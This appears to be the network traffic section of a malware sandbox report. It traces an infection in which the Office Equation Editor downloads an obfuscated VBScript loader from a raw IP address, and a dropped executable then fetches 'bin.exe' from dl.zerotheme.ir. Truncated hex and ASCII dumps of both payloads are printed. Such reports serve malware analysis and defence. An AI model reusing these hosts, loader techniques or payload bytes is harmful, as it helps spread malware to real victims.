                                              Sep 27, 2024 10:57:09.177413940 CEST44349167185.18.213.20192.168.2.22
                                              Sep 27, 2024 10:57:09.645096064 CEST44349167185.18.213.20192.168.2.22
                                              Sep 27, 2024 10:57:09.818219900 CEST44349167185.18.213.20192.168.2.22
                                              Sep 27, 2024 10:57:09.818236113 CEST44349167185.18.213.20192.168.2.22
                                              Sep 27, 2024 10:57:09.818341970 CEST49167443192.168.2.22185.18.213.20
                                              Sep 27, 2024 10:57:09.818375111 CEST44349167185.18.213.20192.168.2.22
                                              Sep 27, 2024 10:57:09.818387032 CEST44349167185.18.213.20192.168.2.22
                                              Sep 27, 2024 10:57:09.818432093 CEST44349167185.18.213.20192.168.2.22
                                              Sep 27, 2024 10:57:09.818453074 CEST49167443192.168.2.22185.18.213.20
                                              Sep 27, 2024 10:57:09.818453074 CEST49167443192.168.2.22185.18.213.20
                                              Sep 27, 2024 10:57:09.818484068 CEST49167443192.168.2.22185.18.213.20
                                              Sep 27, 2024 10:57:09.818770885 CEST49167443192.168.2.22185.18.213.20
                                              Sep 27, 2024 10:57:09.819777012 CEST49167443192.168.2.22185.18.213.20

                                              UDP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Sep 27, 2024 10:57:05.844036102 CEST5456253192.168.2.228.8.8.8
                                              Sep 27, 2024 10:57:05.851135969 CEST53545628.8.8.8192.168.2.22

                                              DNS Queries

                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                              Sep 27, 2024 10:57:05.844036102 CEST192.168.2.228.8.8.80x4506Standard query (0)dl.zerotheme.irA (IP address)IN (0x0001)false

                                              DNS Answers

                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                              Sep 27, 2024 10:57:05.851135969 CEST8.8.8.8192.168.2.220x4506No error (0)dl.zerotheme.ir185.18.213.20A (IP address)IN (0x0001)false

                                              HTTP Request Dependency Graph

                                              • dl.zerotheme.ir
                                              • 185.235.137.223

                                              HTTP Packets

                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              0192.168.2.2249165185.235.137.223803340C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                              TimestampBytes transferredDirectionData
                                              Sep 27, 2024 10:57:02.185199976 CEST333OUTGET /90/seethedifferentofpicture.vbs HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                              Host: 185.235.137.223
                                              Connection: Keep-Alive
                                              Sep 27, 2024 10:57:02.803174019 CEST1236INHTTP/1.1 200 OK
                                              Date: Fri, 27 Sep 2024 08:57:02 GMT
                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
                                              Last-Modified: Thu, 26 Sep 2024 05:31:01 GMT
                                              ETag: "1690f-622ff0b443a84"
                                              Accept-Ranges: bytes
                                              Content-Length: 92431
                                              Keep-Alive: timeout=5, max=100
                                              Connection: Keep-Alive
                                              Content-Type: application/x-vbscript
                                              Data Raw: 27 20 4d 61 69 6e 20 73 63 72 69 70 74 20 6c 6f 67 69 63 20 66 6f 72 20 70 72 6f 63 65 73 73 69 6e 67 20 42 61 73 65 36 34 2d 65 6e 63 6f 64 65 64 20 64 61 74 61 0d 0a 0d 0a 27 20 49 6e 69 74 69 61 6c 69 7a 65 20 74 68 65 20 42 61 73 65 36 34 20 65 6e 63 6f 64 65 64 20 73 74 72 69 6e 67 20 28 70 6c 61 63 65 68 6f 6c 64 65 72 29 0d 0a 44 69 6d 20 65 6e 63 6f 64 65 64 42 61 73 65 36 34 53 74 72 69 6e 67 0d 0a 65 6e 63 6f 64 65 64 42 61 73 65 36 34 53 74 72 69 6e 67 20 3d 20 22 29 29 3b 3b 3b 71 51 40 40 40 40 4d 40 40 40 40 40 40 40 40 45 40 40 40 40 40 40 40 40 2f 2f 38 40 40 40 40 4c 67 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 51 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 67 40 40 40 40 40 40 40 40 40 40 34 66 75 67 34 40 40 74 40 40 6e 4e 49 62 67 2e [TRUNCATED]
                                              Data Ascii: ' Main script logic for processing Base64-encoded data' Initialize the Base64 encoded string (placeholder)Dim encodedBase64StringencodedBase64String = "));;;qQ@@@@M@@@@@@@@E@@@@@@@@//8@@@@Lg@@@@@@@@@@@@@@@@@@Q@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@g@@@@@@@@@@4fug4@@t@@nNIbg...))M0h;;;Ghpcy...wcm9ncmFtIGNhbm5vdC...iZS...ydW4gaW4gRE9))IG1vZGUuDQ0K&&&@@@@@@@@@@@@@@@@@@...QRQ@@@@))@@ED@@Fvx9GY@@@@@@@@@@@@@@@@@@@@O@@@@DgEL@@))@@@@@@I@@@@@@@@C8@@@@@@@@@@@@@@@@Ep4@@@@@@@@g@@@@@@@@o@@@@@@@@@@...@@@@@@@@g@@@@@@@@@@g@@@@...@@@@@@@@@@@@@@@@@@@@E@@@@@@@@@@@@@@@@@@@@@@@@@@Q@@@@@@g@@@@@@@@@@@@@@@@I@@YIU@@@@...@@@@@@...@@@@@@@@@@@@E@@@@@@E@@@@@@@@@@@@@@@@...@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@Lid@@@@...X@@@@@@@@@@M@@@@@@@@Q7@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@K@@@@@@@@w@@@@@@CwSQ@@@@H@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
                                              Sep 27, 2024 10:57:02.803193092 CEST1236INData Raw: 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 49 40 40 40 40 40 40 43 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40
                                              Data Ascii: @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@I@@@@@@C@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@CC@@@@@@Eg@@@@@@@@@@@@@@@@@@@@@@@@@@@@C50ZXh0@@@@@@@@GH4@@@@@@@@g@@@@@@@@g@@@@@@@@@@I@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@C@@@@@@G@@ucm;;;sb2M@@@@@
                                              Sep 27, 2024 10:57:02.803203106 CEST1236INData Raw: 67 40 40 4c 40 40 40 40 40 40 40 40 40 40 77 40 40 40 40 45 51 2e 2e 2e 2b 40 40 77 40 40 40 40 2e 2e 2e 40 40 6f 72 40 40 40 40 59 71 40 40 2e 2e 2e 4d 77 2e 2e 2e 51 2e 2e 2e 4c 40 40 40 40 40 40 40 40 2e 2e 2e 40 40 40 40 40 40 45 53 67 53 40
                                              Data Ascii: g@@L@@@@@@@@@@w@@@@EQ...+@@w@@@@...@@or@@@@Yq@@...Mw...Q...L@@@@@@@@...@@@@@@ESgS@@Q@@GFP4GDw@@@@...nNQ@@@@@@KK@@I...@@@@YoEgE@@...iUmFP4GDQ@@@@...nNQ@@@@@@KK@@4...@@@@YoX@@@@@@...goGK@@4@@@@@@Yl&&&gsHKGg@@@@@@Yl&&&o@@E@@@@@@EKg@@DM@@k@@...w@@
                                              Sep 27, 2024 10:57:02.803212881 CEST1236INData Raw: 40 40 40 40 40 40 43 51 40 40 40 40 45 51 40 40 40 40 46 69 67 62 40 40 40 40 40 40 47 4b 45 73 40 40 40 40 40 40 59 40 40 49 47 6b 2e 2e 2e 40 40 40 40 40 40 6f 49 67 40 40 40 40 2e 2e 2e 69 67 58 40 40 40 40 40 40 47 40 40 40 40 44 65 26 26 26
                                              Data Ascii: @@@@@@CQ@@@@EQ@@@@Figb@@@@@@GKEs@@@@@@Y@@IGk...@@@@@@oIg@@@@...igX@@@@@@G@@@@De&&&go@@IM@@...@@@@@@oIg@@@@...iUm...ii2@@@@@@G&&&SYoc@@@@@@...iUmK...g@@@@@@Y@@@@N4@@KgEQ@@@@@@@@@@@@E@@ICE@@&&&hU@@@@@@EbM@@U@@ng@@@@@@@@o@@@@...E@@@@Cg7@@@@@@G&&&
                                              Sep 27, 2024 10:57:02.803224087 CEST1236INData Raw: 2e 2e 2e 71 49 6c 48 77 77 6f 47 77 40 40 40 40 2e 2e 2e 6e 35 52 40 40 40 40 40 40 4b 6f 69 55 66 45 43 67 62 40 40 40 40 40 40 47 40 40 36 49 6c 48 78 51 6f 47 77 40 40 40 40 2e 2e 2e 68 38 59 4b 2e 2e 2e 73 40 40 40 40 40 40 61 4d 2e 2e 2e 51
                                              Data Ascii: ...qIlHwwoGw@@@@...n5R@@@@@@KoiUfECgb@@@@@@G@@6IlHxQoGw@@@@...h8YK...s@@@@@@aM...Q@@@@@@aIM...xQIKCM...@@@@Yl&&&iYgkgQ@@@@Cgi@@@@@@G&&&SYoFw@@@@...g@@@@3iQN@@CD))...@@@@@@KCI@@@@@@Yl&&&gkotg@@@@...ihw@@@@@@G&&&SYoG@@@@@@...g@@@@3g@@q@@@@@@...E
                                              Sep 27, 2024 10:57:02.803234100 CEST1120INData Raw: 59 40 40 6f 47 66 67 55 40 40 40 40 40 40 51 44 47 3b 3b 3b 69 52 59 40 40 6f 44 47 6c 6a 2b 43 77 45 40 40 2e 2e 2e 68 63 76 43 78 70 46 40 40 51 40 40 40 40 40 40 50 62 2f 2f 2f 38 71 66 67 55 40 40 40 40 40 40 51 44 40 40 68 59 47 4b 46 6b 40
                                              Data Ascii: Y@@oGfgU@@@@@@QDG;;;iRY@@oDGlj+CwE@@...hcvCxpF@@Q@@@@@@Pb///8qfgU@@@@@@QD@@hYGKFk@@@@@@oq@@@@@@@@Ez@@F@@Fw@@@@@@@@O@@@@@@Rfgg@@@@@@Qt;;;...pF@@Q@@@@@@Pb///8XLQbQI@@@@@@...iZyjQ@@@@c@@oGKFI@@@@@@ol&&&gsoUw@@@@CiUm...xYHjmlv;;;@@@@@@CgooDg@@@@Ci
                                              Sep 27, 2024 10:57:02.803244114 CEST1236INData Raw: 59 4b 2e 2e 2e 69 6f 62 4d 40 40 51 40 40 75 40 40 40 40 40 40 40 40 2e 2e 2e 45 40 40 40 40 2e 2e 2e 45 43 4b 44 63 40 40 40 40 40 40 59 6c 26 26 26 67 6f 47 63 72 38 40 40 40 40 48 40 40 6f 38 51 40 40 40 40 2e 2e 2e 67 73 48 46 69 38 66 47 55
                                              Data Ascii: YK...iobM@@Q@@u@@@@@@@@...E@@@@...ECKDc@@@@@@Yl&&&goGcr8@@@@H@@o8Q@@@@...gsHFi8fGUU...@@@@@@@@9v///xct...t@@m@@@@@@G&&&gZy3w@@@@cCjx@@@@@@GCwcWLxMXRQE@@@@@@D2////fls@@@@@@Q))...d5m...x8PW@@sG...yj1@@@@@@GH24uFxtF@@Q@@@@@@Pb///8G...yj1@@@@@@G&&
                                              Sep 27, 2024 10:57:02.803253889 CEST1236INData Raw: 51 40 40 40 40 2e 2e 2e 48 34 4c 40 40 40 40 40 40 45 4b 45 4d 40 40 40 40 40 40 5a 2b 44 51 40 40 40 40 2e 2e 2e 2e 2e 2e 5a 71 4b 2e 2e 2e 73 2e 2e 2e 40 40 40 40 59 52 2e 2e 2e 53 69 77 40 40 40 40 40 40 47 26 26 26 53 59 29 29 43 68 45 4b 4b
                                              Data Ascii: Q@@@@...H4L@@@@@@EKEM@@@@@@Z+DQ@@@@......ZqK...s...@@@@YR...Siw@@@@@@G&&&SY))ChEKKF@@@@@@@@Yl&&&hMLEQooFwE@@...iUm&&&hEKK...c...@@@@Yl&&&ijl@@@@@@G&&&SY))D...EKKF@@@@@@@@Yl&&&ijl@@@@@@GEw0GKOk@@@@@@ZpEw4rNwYRDRYRCyj))@@@@@@G&&&SYmEQoRDRYRCxEMF
                                              Sep 27, 2024 10:57:02.803271055 CEST1236INData Raw: 43 69 55 6d 4b 44 49 40 40 40 40 40 40 6f 6c 26 26 26 67 6f 45 49 50 2f 2f 2f 77 40 40 7a 47 33 34 6d 40 40 40 40 40 40 45 45 77 30 53 44 51 4d 6f 58 77 40 40 40 40 43 69 55 6d 4b 47 40 40 40 40 40 40 40 40 6f 6c 26 26 26 67 77 72 4b 48 34 6d 40
                                              Data Ascii: CiUmKDI@@@@@@ol&&&goEIP///w@@zG34m@@@@@@EEw0SDQMoXw@@@@CiUmKG@@@@@@@@ol&&&gwrKH4m@@@@@@EEw4SDgMoXw@@@@CiUmfiY@@@@@@Q))DxIP...Che@@@@@@K&&&SYoYQ@@@@CgwIKPY@@@@@@Yl&&&gve@@yb+GgYgK@@Q@@@@G9i@@@@@@K&&&SY))E...Y))E))ir@@Q@@@@ER@@REZoN...29j@@@@@@K
                                              Sep 27, 2024 10:57:02.803282976 CEST1236INData Raw: 40 59 6d 4b 40 40 34 40 40 40 40 40 40 70 76 58 40 40 40 40 40 40 43 69 55 6d 46 70 70 76 58 51 40 40 40 40 43 69 55 6d 67 44 30 40 40 40 40 40 40 51 71 40 40 7a 40 40 26 26 26 40 40 40 40 63 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40
                                              Data Ascii: @YmK@@4@@@@@@pvX@@@@@@CiUmFppvXQ@@@@CiUmgD0@@@@@@Qq@@z@@&&&@@@@c@@@@@@@@@@@@@@@@@@@@igk@@@@@@KKg@@bM@@c@@zQE@@@@...Y@@@@...F+PQ@@@@......MMEgwCKF4@@@@@@ooMg@@@@CgoEIP///w@@zLhdF@@Q@@@@@@Pb///8XLQbQM@@@@@@...iZ+PQ@@@@......MNEg0DKF8@@@@@@ol&&&i
                                              Sep 27, 2024 10:57:02.809614897 CEST1236INData Raw: 45 4b 67 40 40 40 40 40 40 7a 40 40 26 26 26 40 40 40 40 63 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 69 67 6b 40 40 40 40 40 40 4b 4b 67 40 40 62 4d 40 40 63 40 40 2b 77 45 40 40 40 40 2e 2e 2e 59 40 40 40 40 2e 2e 2e 46 2b 3b
                                              Data Ascii: EKg@@@@@@z@@&&&@@@@c@@@@@@@@@@@@@@@@@@@@igk@@@@@@KKg@@bM@@c@@+wE@@@@...Y@@@@...F+;;;@@@@@@......MMEgwCKF4@@@@@@ooMg@@@@CiUmCgQg////@@DMuHEU...@@@@@@@@9v///xct...t@@z@@@@@@G&&&n5U@@@@@@EEw0SDQMoXw@@@@CiUmKG@@@@@@@@ol&&&gwrKn5U@@@@@@EEw4SDgMoXw@


                                              HTTPS Proxied Packets

                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              0192.168.2.2249166185.18.213.204433584C:\Users\user\AppData\Local\Temp\temp_executable.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-27 08:57:07 UTC89OUTGET /kokorila/cgl-bin/bin.exe HTTP/1.1
                                              Host: dl.zerotheme.ir
                                              Connection: Keep-Alive
                                              2024-09-27 08:57:07 UTC207INHTTP/1.1 200 OK
                                              Connection: close
                                              content-type: application/x-msdownload
                                              last-modified: Thu, 26 Sep 2024 05:27:52 GMT
                                              accept-ranges: bytes
                                              content-length: 286208
                                              date: Fri, 27 Sep 2024 08:57:07 GMT
                                              2024-09-27 08:57:07 UTC16384INData Raw: 4d 5a 45 52 e8 00 00 00 00 58 83 e8 09 8b c8 83 c0 3c 8b 00 03 c1 83 c0 28 03 08 ff e1 90 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 79 01 09 a0 3d 60 67 f3 3d 60 67 f3 3d 60 67 f3 1a a6 a8 f3 3a 60 67 f3 1a a6 aa f3 3c 60 67 f3 1a a6 ab f3 3c 60 67 f3 52 69 63 68 3d 60 67 f3 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 01 00 17 50 af 59 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 4c 04 00 00 00 00 00 00 00 00 00 30 15 00 00 00 10 00 00 00 60 04 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00
                                              Data Ascii: MZERX<(!L!This program cannot be run in DOS mode.$y=`g=`g=`g:`g<`g<`gRich=`gPELPYL0`@
                                              2024-09-27 08:57:07 UTC16384INData Raw: 82 7a 3b 10 9f 97 53 0a 6b 45 5d b1 04 06 3b ca 23 c4 b1 63 4d 37 18 b7 40 c9 ce 82 ca 0a 99 92 9b c1 92 48 ab ad f2 93 e9 c1 7e 2f 98 4e 21 49 40 ae f9 49 7d da ac 13 4e a0 ab f4 10 30 64 ce 0f 4b 9d 1b ed 00 36 7a 08 95 5d 00 aa 28 35 e4 5a 42 a4 f5 83 c4 1b d1 5c 8e df f6 05 30 b6 c6 8b 75 d6 88 07 9f 53 9f 9b bd 1c 05 21 c6 5a ee a8 9b b4 45 e6 cd de bf 78 08 00 fe 99 16 8b d1 0e 35 e4 d7 91 41 e4 ef f7 1b df 30 ae dd 35 d0 21 8c f6 0b 4b ff dd 1d 99 ad 13 0e 8b 2c a9 d0 56 6e d4 bd 32 6f 26 0c 79 d3 f8 ec 7e 79 db b6 6a a8 92 c9 8a 59 e4 ab ac 25 eb db 55 a6 49 15 24 35 62 59 74 64 87 4b c5 d8 fe 31 fd 50 39 e8 e0 44 60 7d 8a 7b de 5f a9 e6 8c ca 7c f2 55 5b 78 12 88 aa 06 f6 06 3b 7a a2 79 d7 9a 59 8c 6b a8 80 e3 da 4e 31 0c 17 b3 de f7 00 42 b8 60
                                              Data Ascii: z;SkE];#cM7@H~/N!I@I}N0dK6z](5ZB\0uS!ZEx5A05!K,Vn2o&y~yjY%UI$5bYtdK1P9D`}{_|U[x;zyYkN1B`
                                              2024-09-27 08:57:07 UTC16384INData Raw: 47 b6 02 c6 fa 61 87 56 c2 2f a8 ac 65 92 ec ee a2 7e 1f 14 1f 31 5c 71 2b 86 50 26 84 e8 95 97 c4 ca 76 b2 9e 9b 63 33 59 12 62 dc 6f 3a 71 54 a4 ca e3 a0 a1 51 a0 19 4f 13 ca f5 f7 b1 ea 9a 6f db f0 fa dc 2b 3c de f5 ee 0c 6c 3a 80 41 2b 4e 65 96 2c be 59 a2 9b a5 20 3e 43 d9 84 a9 1f c0 c4 80 fa 6e 50 d0 0e 9e 34 ab c8 1c f8 80 21 33 48 f9 0d 1a 41 91 4b 8a 7f 47 be c1 71 6b 4b e7 7c 8a 2d b2 2e 00 e2 e2 3d e1 8e ce 2f 83 b0 9f 1b ea c3 45 2b 10 7c 23 34 41 eb e5 a6 22 d2 8a 0b 43 6f a5 0a e3 43 79 fe 30 4f cd 65 e1 e2 29 b7 e6 24 29 90 37 65 50 d1 59 61 b9 75 d2 91 6a 62 1f 69 0a 89 76 93 e7 f5 a5 a7 8e 46 d8 15 fa 02 1c 9a 22 45 d0 d6 36 69 b6 cf 44 ce ac 9a 9b c3 cf 2a 3b 39 7b 5c bc 7c 0a f3 bc d2 7b dd 9b 61 90 0b 5f 92 d5 f5 8a 6f db 31 d4 b7 b2
                                              Data Ascii: GaV/e~1\q+P&vc3Ybo:qTQOo+<l:A+Ne,Y >CnP4!3HAKGqkK|-.=/E+|#4A"CoCy0Oe)$)7ePYaujbivF"E6iD*;9{\|{a_o1
                                              2024-09-27 08:57:07 UTC16384INData Raw: e6 61 cb a4 4a a8 0d 00 41 fb 98 4e 3f 72 48 c8 e7 1e 6e d5 9a 84 72 b5 21 7f 3b 24 22 1c 8f a6 58 39 8d 57 5e ee 2f d3 5e d7 2a b5 a8 ef 63 1c e4 05 f6 de bc d8 d1 ec c6 4c 87 14 28 ba a2 7b 4c d7 fe ed dd d2 3c 2c 67 ab 57 54 63 a9 be 27 c7 d5 45 65 47 c6 80 52 0d 1d 8b c8 78 d4 12 7d 86 24 0f b0 8e f9 aa a3 90 ae 58 15 f2 8c 9a 9a 99 70 5e 4f 9b 93 ce 4e 49 6c be f9 97 6d 67 43 04 62 54 30 0c 44 b2 9f 32 33 29 45 05 30 36 c6 ee 40 a4 a2 5a 9b f9 12 d5 ef 03 87 30 e9 ef 9f 3a be 52 85 d1 74 bf 8c 32 ee 32 74 30 0a ac df fa 2c 36 e3 14 81 6b 63 19 e0 79 d0 cd ec bd 53 88 79 62 7b 77 b3 12 50 ff 03 8f a6 8e 70 5f 86 e8 3b f2 13 3d b5 96 d1 73 38 00 94 10 87 1a 57 d0 1f be 89 9f d7 ba c8 c5 05 31 80 f6 d9 bd e8 df 28 4f de 47 74 d8 17 21 b3 03 19 d3 ff 83
                                              Data Ascii: aJAN?rHnr!;$"X9W^/^*cL({L<,gWTc'EeGRx}$Xp^ONIlmgCbT0D23)E06@Z0:Rt22t0,6kcySyb{wPp_;=s8W1(OGt!
                                              2024-09-27 08:57:07 UTC16384INData Raw: d8 dc c6 74 2f 65 f5 5f e9 a8 e7 37 7a e9 35 99 4d 27 c3 e8 50 88 99 fc f7 7d 12 f8 04 c1 3c 42 f4 d9 5c 86 3c 3f 80 f1 13 2f 9f 35 28 62 38 50 5a 66 1b f3 57 07 ae 56 83 6f 10 6b 01 85 d2 03 b8 a0 3c 40 d9 9d 89 23 a4 b3 17 77 97 b8 53 cf 09 fb 87 5f 30 0b c8 e7 ec 5a f8 cd 95 59 95 0f ea 24 94 23 33 e0 f5 80 f2 5a ca fe ba c9 50 35 b8 51 da c0 fa 73 3d 5b ff 08 1c 90 4d b1 83 66 66 23 82 eb a6 28 ef f6 46 fd 73 10 61 e8 56 3b f2 7b 07 39 5f 49 c6 67 6c 4e 63 87 c6 60 c2 66 76 13 34 17 33 bf d0 5c bf 1b 3e 83 b3 82 a1 67 29 c7 c3 5d 0c a7 c1 46 06 1c 81 c8 47 b3 74 1b ab aa 67 c4 83 a7 6b eb ee 4d 02 b8 b1 f3 e5 ad 91 d5 3a a0 e8 70 50 8e c6 f6 37 7d 24 d4 ad 78 52 05 b9 d1 df 5d 3f da 42 f8 cd 48 8f 5b 42 0b 2a 28 d4 c2 77 1e 28 83 c6 18 0f 05 fc 8e 0f
                                              Data Ascii: t/e_7z5M'P}<B\<?/5(b8PZfWVok<@#wS_0ZY$#3ZP5Qs=[Mff#(FsaV;{9_IglNc`fv43\>g)]FGtgkM:pP7}$xR]?BH[B*(w(
                                              2024-09-27 08:57:07 UTC16384INData Raw: db 39 51 fa d2 db 4c e8 df 54 17 f3 63 16 b9 cb 11 45 56 6e 39 69 1e f4 9a 6c 24 fc 72 20 5e 34 7f 3d ff d8 5f e9 94 a3 fa 64 af 9f 42 25 35 13 3d 43 78 fb 51 ab 76 d3 62 82 dd e1 3c d8 c4 21 59 f1 d0 2a f6 c7 26 ef 61 cf c3 63 89 7b 53 d6 48 48 4d 67 62 41 85 9f e1 34 a2 50 fd e3 58 4e 4b 36 3d d7 b5 ff bc 32 b2 01 5a a9 93 1a cf 54 b3 be 40 d8 b2 e8 b2 a1 6a 37 a5 1a d6 6a ac 2f d9 e1 64 a0 41 21 94 c6 cc d4 6b 49 7e 68 3d 0e 57 48 69 75 e3 22 ee 16 f0 8a 96 87 e4 92 9d 1f 5e 74 b3 b2 4c 26 e7 cd c7 c1 c6 17 af 2b f2 78 8b 45 1e 28 b2 83 6d 5a c6 f1 b9 17 24 48 59 17 3b b3 f3 58 62 a7 dc 47 a2 33 39 aa 94 e8 c0 8e e2 a4 a2 30 f8 92 c5 51 98 a7 b3 de 96 5f f6 b2 38 75 e6 df 32 b1 9d a8 19 1a 59 a4 3d ef 20 ea 44 09 dc e4 17 6c 30 8d 91 c1 aa 91 d9 38 38
                                              Data Ascii: 9QLTcEVn9il$r ^4=_dB%5=CxQvb<!Y*&ac{SHHMgbA4PXNK6=2ZT@j7j/dA!kI~h=WHiu"^tL&+xE(mZ$HY;XbG390Q_8u2Y= Dl088
                                              2024-09-27 08:57:08 UTC16384INData Raw: af 51 55 28 42 0e 63 9d 55 f7 33 c7 7f 20 a7 6b 65 86 2b 11 70 e9 37 54 37 2b f0 59 1d d9 29 fc 37 b4 ea 67 a9 ec 77 94 29 72 c6 58 d4 a0 2f 4b df a0 a7 19 78 32 f1 4f c8 a0 34 23 4a 3d 50 95 19 76 b0 d2 22 2b 2f e1 e8 af 49 fb 2d c0 35 9b f2 66 fe da b3 27 1d 7f 91 e4 12 a8 00 d9 4d b8 ef bd 1a 14 b4 03 c5 72 32 a9 0b 7f d9 4f b1 72 50 cb a7 ec 5a 81 3a 7d b0 49 df c4 8a 38 c1 29 ee 0f f9 b0 db 2d b2 3d 4f 41 ba f5 20 b1 64 c8 e8 8a ab 2f de 8d b5 ba d4 a1 ab 1d 1d 21 fc 66 f6 f1 c0 6b 43 7b 22 b6 67 e3 6e 3b 1e 57 7b 79 9c 67 b4 79 61 91 a6 03 21 b3 f2 e3 c5 c6 dc 38 4a b2 ec 09 41 8d b8 74 0e 03 43 88 42 d8 8b 0d 3f 90 42 7b 66 da 9b e5 d2 a6 ff 84 df 52 8e bd fd 06 eb 07 57 ad 46 47 0f 8a c5 7b a8 b6 65 3d e4 6f de 6c eb bc 9b 08 1a 57 f9 77 f6 ac d4
                                              Data Ascii: QU(BcU3 ke+p7T7+Y)7gw)rX/Kx2O4#J=Pv"+/I-5f'Mr2OrPZ:}I8)-=OA d/!fkC{"gn;W{ygya!8JAtCB?B{fRWFG{e=olWw
                                              2024-09-27 08:57:08 UTC16384INData Raw: 55 fb 28 ea 05 41 42 0f 18 00 4f 0e 2c 8b c2 70 2a 15 ad f4 1b f8 30 fd f6 9d 71 a0 56 fd c7 4a 65 d1 9d f9 cb ca 6f 3e e7 b0 c5 34 64 e0 2f e1 12 71 27 0c 24 63 e0 0e 4d b2 4e 8a c2 cd 77 64 5f ef 30 95 fa db af 01 eb 32 56 9e c1 b5 5b e3 d8 14 22 56 bf f0 5d 2c e0 ee 34 48 54 af f3 de e8 49 74 08 d1 70 28 17 73 c7 d8 cc b9 94 d7 3b 27 08 9d 0a ac 17 ab 51 c0 59 26 f8 f0 ac 33 b6 78 18 07 be a0 f1 24 e6 e4 c1 85 c5 02 c9 63 bb 4b 50 1b 64 d0 e0 10 bf aa 78 2e 76 1a 5d 5f 62 14 8f 28 fc 02 13 12 c0 61 c8 5b b0 b1 6d 9d f6 fa 8b f0 2e 7e 17 0d 55 45 a7 b0 01 f7 f6 78 fb 9f 77 3e a3 8a d9 b4 f3 41 ec 37 25 36 46 bf d9 80 d2 ce 65 8c 84 00 46 58 b0 00 eb cd 8e c5 be 30 d1 0c e5 ab 09 ab 03 9d 79 3d f7 56 20 15 13 5e 6e 92 7c 80 e4 51 5b 20 04 02 db 1f 48 dc
                                              Data Ascii: U(ABO,p*0qVJeo>4d/q'$cMNwd_02V["V],4HTItp(s;'QY&3x$cKPdx.v]_b(a[m.~UExw>A7%6FeFX0y=V ^n|Q[ H
                                              2024-09-27 08:57:08 UTC16384INData Raw: 33 2f 6e 25 42 80 db eb 74 b0 ae 6e 26 a9 c6 ea e2 85 af 3a 87 fd 9d a6 a9 04 f1 2e 0b ad 57 c3 43 36 bd f7 29 dc 71 b0 de 93 c0 86 6a 0f 09 4d 29 27 95 c2 80 49 7c 65 1e 4e cc a0 69 20 b9 50 27 b8 88 a8 4b d1 3b c0 82 23 f2 0d 66 c7 6a cd ed 45 9f 90 88 9a 2b 45 50 4c 33 a1 05 33 fe 95 9e 19 37 38 1a 54 45 ad 34 c0 38 0b 87 4f fd 6b 41 20 90 31 42 b0 34 e9 91 89 66 3f bb 41 23 8d 3f b3 0c 55 c6 c2 fd 4d 20 ba 15 a7 df ec 89 ff 94 d9 f3 21 cf e1 ce 78 87 ef 22 01 de 5f 17 a7 f4 98 2b 00 99 1a 37 91 07 dc 79 51 20 ef 8d 16 57 9c 28 ce e3 4d 42 f6 5d 46 7d ad d0 68 17 61 c9 7b f2 4d 02 83 d5 22 8e 7e 32 4a 01 49 a5 3a 2b 3b ee 3f 03 12 00 7d 2a 5a f4 0e 0e ab 58 88 43 1c 15 0e f2 2b 2c ec 36 a5 c2 f9 e7 79 e9 65 fd 2c 9a f9 b8 7f be f8 f0 00 a8 29 c6 a7 b5
                                              Data Ascii: 3/n%Btn&:.WC6)qjM)'I|eNi P'K;#fjE+EPL3378TE48OkA 1B4f?A#?UM !x"_+7yQ W(MB]F}ha{M"~2JI:+;?}*ZXC+,6ye,)
